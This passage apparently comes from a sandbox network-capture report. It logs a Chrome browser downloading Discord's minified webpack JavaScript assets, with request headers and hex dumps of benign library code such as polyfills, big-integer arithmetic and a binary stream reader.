                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 6e 26 26 75 28 65 2c 22 6d 65 73 73 61 67 65 22 2c 6e 29 2c 76 28 65 2c 6d 2c 65 2e 73 74 61 63 6b 2c 32 29 2c 74 68 69 73 26 26 6f 28 52 2c 74 68 69 73 29 26 26 66 28 65 2c 74 68 69 73 2c 6d 29 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 79 26 26 70 28 65 2c 61 72 67 75 6d 65 6e 74 73 5b 79 5d 29 2c 65 7d 29 3b 69 66 28 6d 2e 70 72 6f 74 6f 74 79 70 65 3d 52 2c 22 45 72 72 6f 72 22 21 3d 3d 62 3f 63 3f 63 28 6d 2c 6b 29 3a 61 28 6d 2c 6b 2c 7b 6e 61 6d 65 3a 21 30 7d 29 3a 78 26 26 67 20 69 6e 20 49 26 26 28 73 28 6d 2c 49 2c 67 29 2c 73 28 6d 2c 49 2c 22 70 72 65 70 61 72 65 53 74 61 63 6b 54 72 61 63 65 22 29 29 2c 61 28 6d 2c 49 29 2c 21 68 29 74 72 79 7b 52 2e 6e 61 6d 65 21 3d 3d 62 26 26 75
                                                                          Data Ascii: return void 0!==n&&u(e,"message",n),v(e,m,e.stack,2),this&&o(R,this)&&f(e,this,m),arguments.length>y&&p(e,arguments[y]),e});if(m.prototype=R,"Error"!==b?c?c(m,k):a(m,k,{name:!0}):x&&g in I&&(s(m,I,g),s(m,I,"prepareStackTrace")),a(m,I),!h)try{R.name!==b&&u
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 7d 29 2c 66 28 22 52 75 6e 74 69 6d 65 45 72 72 6f 72 22 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 75 28 74 2c 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 29 7d 2c 37 38 30 34 34 30 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 6e 28 22 38 35 39 35 31 34 22 29 2c 69 3d 6e 28 22 32 37 34 31 39 38 22 29 3b 65 28 7b 74 61 72 67 65 74 3a 22 52 65 67 45 78 70 22 2c 70 72 6f 74 6f 3a 21 30 2c 66 6f 72 63 65 64 3a 2f 2e 2f 2e 65 78 65 63 21 3d 3d 69 7d 2c 7b 65 78 65 63 3a 69 7d 29 7d 2c 37 38 31 37 33 38 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 6e 28 22
                                                                          Data Ascii: }),f("RuntimeError",function(t){return function(r){return u(t,this,arguments)}})},780440:function(t,r,n){"use strict";var e=n("859514"),i=n("274198");e({target:"RegExp",proto:!0,forced:/./.exec!==i},{exec:i})},781738:function(t,r,n){"use strict";var e=n("
                                                                          2023-12-10 16:45:11 UTC206INData Raw: 67 74 68 29 7d 72 65 74 75 72 6e 20 24 2b 53 28 63 2c 41 29 7d 5d 7d 2c 21 21 63 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 2f 2e 2f 3b 72 65 74 75 72 6e 20 74 2e 65 78 65 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 5b 5d 3b 72 65 74 75 72 6e 20 74 2e 67 72 6f 75 70 73 3d 7b 61 3a 22 37 22 7d 2c 74 7d 2c 22 37 22 21 3d 3d 22 22 2e 72 65 70 6c 61 63 65 28 74 2c 22 24 3c 61 3e 22 29 7d 29 7c 7c 21 24 7c 7c 41 29 7d 7d 5d 29 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 39 34 32 38 38 2e 64 62 64 37 33 65 63 62 36 62 31 34 38 32 61 38 37 30 62 37 2e 6a 73 2e 6d 61 70
                                                                          Data Ascii: gth)}return $+S(c,A)}]},!!c(function(){var t=/./;return t.exec=function(){var t=[];return t.groups={a:"7"},t},"7"!=="".replace(t,"$<a>")})||!$||A)}}]);//# sourceMappingURL=94288.dbd73ecb6b1482a870b7.js.map


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          249192.168.2.549983162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:11 UTC866OUTGET /assets/25653.f1981721227784f0166e.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=aDxqWxmtKzcKeNc4IMfmcFpoMNSAUV.5pLaNR6SS2V8-1702226710633-0-604800000
                                                                          2023-12-10 16:45:11 UTC972INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 34 32 33 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 66 31 38 39 36 39 62 33 64 61 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:11 GMTContent-Type: application/javascriptContent-Length: 164235Connection: closeCF-Ray: 8336f4f18969b3da-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.c
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 32 35 36 35 33 22 5d 2c 7b 35 35 32 34 34 32 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 74 3d 6e 2e 6e 6d 64 28 74 29 2c 6e 28 22 34 32 34 39 37 33 22 29 2c 6e 28 22 38 34 33 37 36 32 22 29 2c 6e 28 22 38 35 34 35 30 38 22 29 2c 6e 28 22 37 30 31 30 32 22 29 2c 6e 28 22 32 37 34 36 33 35 22 29 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 73 28 39 30 30 37 31 39 39 32 35 34 37 34 30 39 39 32 29 2c 6e 3d 22 30 31 32 33 34 35 36 37 38 39 61 62 63 64 65 66 67 68 69 6a 6b
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["25653"],{552442:function(t,r,n){t=n.nmd(t),n("424973"),n("843762"),n("854508"),n("70102"),n("274635");var e=function(t){"use strict";var r=s(9007199254740992),n="0123456789abcdefghijk
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 5b 65 5d 2d 31 65 37 2b 72 29 2f 31 65 37 29 2c 6f 5b 65 5d 3d 6e 2d 31 65 37 2a 72 2c 72 2b 3d 31 3b 66 6f 72 28 3b 72 3e 30 3b 29 6f 5b 65 2b 2b 5d 3d 72 25 31 65 37 2c 72 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 31 65 37 29 3b 72 65 74 75 72 6e 20 6f 7d 66 75 6e 63 74 69 6f 6e 20 62 28 74 2c 72 29 7b 76 61 72 20 6e 2c 65 2c 69 3d 74 2e 6c 65 6e 67 74 68 2c 6f 3d 72 2e 6c 65 6e 67 74 68 2c 75 3d 41 72 72 61 79 28 69 29 2c 61 3d 30 3b 66 6f 72 28 6e 3d 30 3b 6e 3c 6f 3b 6e 2b 2b 29 28 65 3d 74 5b 6e 5d 2d 61 2d 72 5b 6e 5d 29 3c 30 3f 28 65 2b 3d 31 65 37 2c 61 3d 31 29 3a 61 3d 30 2c 75 5b 6e 5d 3d 65 3b 66 6f 72 28 6e 3d 6f 3b 6e 3c 69 3b 6e 2b 2b 29 7b 69 66 28 28 65 3d 74 5b 6e 5d 2d 61 29 3c 30 29 65 2b 3d 31 65 37 3b 65 6c 73 65 7b 75 5b 6e 2b 2b
                                                                          Data Ascii: [e]-1e7+r)/1e7),o[e]=n-1e7*r,r+=1;for(;r>0;)o[e++]=r%1e7,r=Math.floor(r/1e7);return o}function b(t,r){var n,e,i=t.length,o=r.length,u=Array(i),a=0;for(n=0;n<o;n++)(e=t[n]-a-r[n])<0?(e+=1e7,a=1):a=0,u[n]=e;for(n=o;n<i;n++){if((e=t[n]-a)<0)e+=1e7;else{u[n++
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 6e 20 77 28 74 2c 72 29 7b 76 61 72 20 6e 2c 65 2c 69 3d 74 2e 6c 65 6e 67 74 68 2c 6f 3d 41 72 72 61 79 28 69 29 2c 75 3d 30 3b 66 6f 72 28 65 3d 30 3b 65 3c 69 3b 65 2b 2b 29 75 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 6e 3d 74 5b 65 5d 2a 72 2b 75 29 2f 31 65 37 29 2c 6f 5b 65 5d 3d 6e 2d 31 65 37 2a 75 3b 66 6f 72 28 3b 75 3e 30 3b 29 6f 5b 65 2b 2b 5d 3d 75 25 31 65 37 2c 75 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 75 2f 31 65 37 29 3b 72 65 74 75 72 6e 20 6f 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 74 2c 72 29 7b 66 6f 72 28 76 61 72 20 6e 3d 5b 5d 3b 72 2d 2d 20 3e 30 3b 29 6e 2e 70 75 73 68 28 30 29 3b 72 65 74 75 72 6e 20 6e 2e 63 6f 6e 63 61 74 28 74 29 7d 75 2e 70 72 6f 74 6f 74 79 70 65 2e 73 75 62 74 72 61 63 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76
                                                                          Data Ascii: n w(t,r){var n,e,i=t.length,o=Array(i),u=0;for(e=0;e<i;e++)u=Math.floor((n=t[e]*r+u)/1e7),o[e]=n-1e7*u;for(;u>0;)o[e++]=u%1e7,u=Math.floor(u/1e7);return o}function k(t,r){for(var n=[];r-- >0;)n.push(0);return n.concat(t)}u.prototype.subtract=function(t){v
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 65 2c 69 2c 6f 3d 74 2e 6c 65 6e 67 74 68 2c 75 3d 70 28 6f 2b 6f 29 3b 66 6f 72 28 65 3d 30 3b 65 3c 6f 3b 65 2b 2b 29 7b 6e 3d 30 2d 28 69 3d 74 5b 65 5d 29 2a 69 3b 66 6f 72 28 76 61 72 20 61 3d 65 3b 61 3c 6f 3b 61 2b 2b 29 6e 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 3d 32 2a 28 69 2a 74 5b 61 5d 29 2b 75 5b 65 2b 61 5d 2b 6e 29 2f 31 65 37 29 2c 75 5b 65 2b 61 5d 3d 72 2d 31 65 37 2a 6e 3b 75 5b 65 2b 6f 5d 3d 6e 7d 72 65 74 75 72 6e 20 68 28 75 29 2c 75 7d 75 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 75 6c 74 69 70 6c 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 72 2c 6e 2c 65 2c 69 3d 48 28 74 29 2c 61 3d 74 68 69 73 2e 76 61 6c 75 65 2c 66 3d 69 2e 76 61 6c 75 65 2c 63 3d 74 68 69 73 2e 73 69 67 6e 21 3d 3d 69 2e 73 69 67 6e 3b 69 66 28 69 2e
                                                                          Data Ascii: e,i,o=t.length,u=p(o+o);for(e=0;e<o;e++){n=0-(i=t[e])*i;for(var a=e;a<o;a++)n=Math.floor((r=2*(i*t[a])+u[e+a]+n)/1e7),u[e+a]=r-1e7*n;u[e+o]=n}return h(u),u}u.prototype.multiply=function(t){var r,n,e,i=H(t),a=this.value,f=i.value,c=this.sign!==i.sign;if(i.
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 71 75 61 72 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 76 61 6c 75 65 2a 74 68 69 73 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 63 28 74 29 3f 6e 65 77 20 61 28 74 29 3a 6e 65 77 20 75 28 52 28 73 28 4d 61 74 68 2e 61 62 73 28 74 68 69 73 2e 76 61 6c 75 65 29 29 29 2c 21 31 29 7d 2c 66 2e 70 72 6f 74 6f 74 79 70 65 2e 73 71 75 61 72 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 66 28 74 68 69 73 2e 76 61 6c 75 65 2a 74 68 69 73 2e 76 61 6c 75 65 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 78 28 74 2c 72 29 7b 76 61 72 20 6e 2c 65 2c 69 2c 6f 2c 75 3d 74 2e 6c 65 6e 67 74 68 2c 61 3d 70 28 75 29 3b 66 6f 72 28 69 3d 30 2c 6e 3d 75 2d 31 3b 6e 3e 3d 30 3b 2d 2d 6e 29 65 3d 76 28 28 6f 3d 31 65 37 2a 69 2b 74
                                                                          Data Ascii: quare=function(){var t=this.value*this.value;return c(t)?new a(t):new u(R(s(Math.abs(this.value))),!1)},f.prototype.square=function(t){return new f(this.value*this.value)};function x(t,r){var n,e,i,o,u=t.length,a=p(u);for(i=0,n=u-1;n>=0;--n)e=v((o=1e7*i+t
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 74 75 72 6e 20 64 3d 78 28 64 2c 67 29 5b 30 5d 2c 5b 6c 28 68 29 2c 6c 28 64 29 5d 7d 28 67 2c 64 29 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 66 6f 72 28 76 61 72 20 6e 2c 65 2c 69 2c 6f 2c 75 2c 61 3d 74 2e 6c 65 6e 67 74 68 2c 66 3d 72 2e 6c 65 6e 67 74 68 2c 63 3d 5b 5d 2c 73 3d 5b 5d 3b 61 3b 29 7b 69 66 28 73 2e 75 6e 73 68 69 66 74 28 74 5b 2d 2d 61 5d 29 2c 68 28 73 29 2c 30 3e 53 28 73 2c 72 29 29 7b 63 2e 70 75 73 68 28 30 29 3b 63 6f 6e 74 69 6e 75 65 7d 65 3d 73 2e 6c 65 6e 67 74 68 2c 69 3d 31 65 37 2a 73 5b 65 2d 31 5d 2b 73 5b 65 2d 32 5d 2c 6f 3d 31 65 37 2a 72 5b 66 2d 31 5d 2b 72 5b 66 2d 32 5d 2c 65 3e 66 26 26 28 69 3d 28 69 2b 31 29 2a 31 65 37 29 2c 6e 3d 4d 61 74 68 2e 63 65 69 6c 28 69 2f 6f 29 3b 64 6f 7b 69 66 28 30 3e 3d 53
                                                                          Data Ascii: turn d=x(d,g)[0],[l(h),l(d)]}(g,d):function(t,r){for(var n,e,i,o,u,a=t.length,f=r.length,c=[],s=[];a;){if(s.unshift(t[--a]),h(s),0>S(s,r)){c.push(0);continue}e=s.length,i=1e7*s[e-1]+s[e-2],o=1e7*r[f-1]+r[f-2],e>f&&(i=(i+1)*1e7),n=Math.ceil(i/o);do{if(0>=S
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 28 74 29 2e 76 61 6c 75 65 29 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 76 65 72 3d 61 2e 70 72 6f 74 6f 74 79 70 65 2e 64 69 76 69 64 65 3d 75 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 76 65 72 3d 75 2e 70 72 6f 74 6f 74 79 70 65 2e 64 69 76 69 64 65 2c 75 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 6f 64 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 41 28 74 68 69 73 2c 74 29 5b 31 5d 7d 2c 66 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 6f 64 3d 66 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 6d 61 69 6e 64 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 66 28 74 68 69 73 2e 76 61 6c 75 65 25 48 28 74 29 2e 76 61 6c 75 65 29 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 6d 61 69 6e 64 65 72 3d 61 2e 70 72 6f 74 6f 74 79 70 65 2e 6d
                                                                          Data Ascii: (t).value)},a.prototype.over=a.prototype.divide=u.prototype.over=u.prototype.divide,u.prototype.mod=function(t){return A(this,t)[1]},f.prototype.mod=f.prototype.remainder=function(t){return new f(this.value%H(t).value)},a.prototype.remainder=a.prototype.m
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 20 6e 7d 2c 66 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 6f 64 50 6f 77 3d 61 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 6f 64 50 6f 77 3d 75 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 6f 64 50 6f 77 2c 75 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6d 70 61 72 65 41 62 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 72 3d 48 28 74 29 2c 6e 3d 74 68 69 73 2e 76 61 6c 75 65 2c 65 3d 72 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 72 2e 69 73 53 6d 61 6c 6c 3f 31 3a 53 28 6e 2c 65 29 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6d 70 61 72 65 41 62 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 72 3d 48 28 74 29 2c 6e 3d 4d 61 74 68 2e 61 62 73 28 74 68 69 73 2e 76 61 6c 75 65 29 2c 65 3d 72 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 72 2e 69 73 53 6d 61 6c 6c 3f 6e 3d
                                                                          Data Ascii: n},f.prototype.modPow=a.prototype.modPow=u.prototype.modPow,u.prototype.compareAbs=function(t){var r=H(t),n=this.value,e=r.value;return r.isSmall?1:S(n,e)},a.prototype.compareAbs=function(t){var r=H(t),n=Math.abs(this.value),e=r.value;return r.isSmall?n=
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 74 79 70 65 2e 67 72 65 61 74 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 63 6f 6d 70 61 72 65 28 74 29 3e 30 7d 2c 66 2e 70 72 6f 74 6f 74 79 70 65 2e 67 74 3d 66 2e 70 72 6f 74 6f 74 79 70 65 2e 67 72 65 61 74 65 72 3d 61 2e 70 72 6f 74 6f 74 79 70 65 2e 67 74 3d 61 2e 70 72 6f 74 6f 74 79 70 65 2e 67 72 65 61 74 65 72 3d 75 2e 70 72 6f 74 6f 74 79 70 65 2e 67 74 3d 75 2e 70 72 6f 74 6f 74 79 70 65 2e 67 72 65 61 74 65 72 2c 75 2e 70 72 6f 74 6f 74 79 70 65 2e 6c 65 73 73 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 30 3e 74 68 69 73 2e 63 6f 6d 70 61 72 65 28 74 29 7d 2c 66 2e 70 72 6f 74 6f 74 79 70 65 2e 6c 74 3d 66 2e 70 72 6f 74 6f 74 79 70 65 2e 6c 65 73 73 65 72 3d 61 2e 70 72 6f 74 6f 74
                                                                          Data Ascii: type.greater=function(t){return this.compare(t)>0},f.prototype.gt=f.prototype.greater=a.prototype.gt=a.prototype.greater=u.prototype.gt=u.prototype.greater,u.prototype.lesser=function(t){return 0>this.compare(t)},f.prototype.lt=f.prototype.lesser=a.protot


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          250192.168.2.549984162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:11 UTC866OUTGET /assets/13942.42b3309fce7f57e5eb63.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=aDxqWxmtKzcKeNc4IMfmcFpoMNSAUV.5pLaNR6SS2V8-1702226710633-0-604800000
                                                                          2023-12-10 16:45:11 UTC968INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 34 30 37 30 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 66 32 61 62 63 65 37 34 62 34 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:11 GMTContent-Type: application/javascriptContent-Length: 140709Connection: closeCF-Ray: 8336f4f2abce74b4-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.c
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 31 33 39 34 32 22 5d 2c 7b 39 36 39 31 37 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 69 29 7b 76 61 72 20 73 3d 69 28 22 33 35 34 30 36 39 22 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 73 28 74 2c 65 29 7d 7d 2c 34 36 39 35 32 30 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 69 29 7b 69 28 22 34 32 34 39 37 33 22 29 2c 69 28 22 33 31 31 37 39 30 22 29 2c 69 28 22 34 37 37 36 35 37 22 29 2c 69 28 22 38 31 31 38 37 35 22 29 2c 69 28 22 39 30 33 30 31 22 29 2c 69 28 22 36 35 32 31 35 33 22 29
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["13942"],{969176:function(t,e,i){var s=i("354069");t.exports=function(t,e){return s(t,e)}},469520:function(t,e,i){i("424973"),i("311790"),i("477657"),i("811875"),i("90301"),i("652153")
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 28 6f 29 2c 28 73 3f 22 2d 22 3a 22 22 29 2b 6e 2b 22 3a 22 2b 69 28 61 2c 32 29 2b 22 3a 22 2b 69 28 72 2c 32 29 2b 22 2e 22 2b 69 28 6f 2c 33 29 7d 2c 6e 2e 70 72 69 6e 74 52 61 6e 67 65 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2e 6c 65 6e 67 74 68 3b 69 66 28 21 28 65 3e 30 29 29 72 65 74 75 72 6e 22 28 65 6d 70 74 79 29 22 3b 66 6f 72 28 76 61 72 20 69 3d 22 22 2c 73 3d 30 3b 73 3c 65 3b 73 2b 2b 29 73 3e 30 26 26 28 69 2b 3d 22 2c 22 29 2c 69 2b 3d 22 5b 22 2b 6e 2e 67 65 74 44 75 72 61 74 69 6f 6e 53 74 72 69 6e 67 28 74 2e 73 74 61 72 74 28 73 29 29 2b 22 2c 22 2b 6e 2e 67 65 74 44 75 72 61 74 69 6f 6e 53 74 72 69 6e 67 28 74 2e 65 6e 64 28 73 29 29 2b 22 5d 22 3b 72 65 74 75 72 6e 20 69 7d 2c 76 6f 69 64 20 30 21 3d 3d 65 26
                                                                          Data Ascii: (o),(s?"-":"")+n+":"+i(a,2)+":"+i(r,2)+"."+i(o,3)},n.printRanges=function(t){var e=t.length;if(!(e>0))return"(empty)";for(var i="",s=0;s<e;s++)s>0&&(i+=","),i+="["+n.getDurationString(t.start(s))+","+n.getDurationString(t.end(s))+"]";return i},void 0!==e&
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 70 6f 73 69 74 69 6f 6e 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 38 3a 69 66 28 65 29 74 68 72 6f 77 22 4e 6f 20 6d 65 74 68 6f 64 20 66 6f 72 20 72 65 61 64 69 6e 67 20 73 69 67 6e 65 64 20 36 34 20 62 69 74 73 20 76 61 6c 75 65 73 22 3b 69 3d 74 68 69 73 2e 64 61 74 61 76 69 65 77 2e 67 65 74 55 69 6e 74 33 32 28 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 29 3c 3c 33 32 7c 74 68 69 73 2e 64 61 74 61 76 69 65 77 2e 67 65 74 55 69 6e 74 33 32 28 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 2b 34 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 22 72 65 61 64 49 6e 74 20 6d 65 74 68 6f 64 20 6e 6f 74 20 69 6d 70 6c 65 6d 65 6e 74 65 64 20 66 6f 72 20 73 69 7a 65 3a 20 22 2b 74 7d 72 65 74 75 72 6e 20 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 2b 3d 74 2c 69
                                                                          Data Ascii: position);break;case 8:if(e)throw"No method for reading signed 64 bits values";i=this.dataview.getUint32(this.position)<<32|this.dataview.getUint32(this.position+4);break;default:throw"readInt method not implemented for size: "+t}return this.position+=t,i
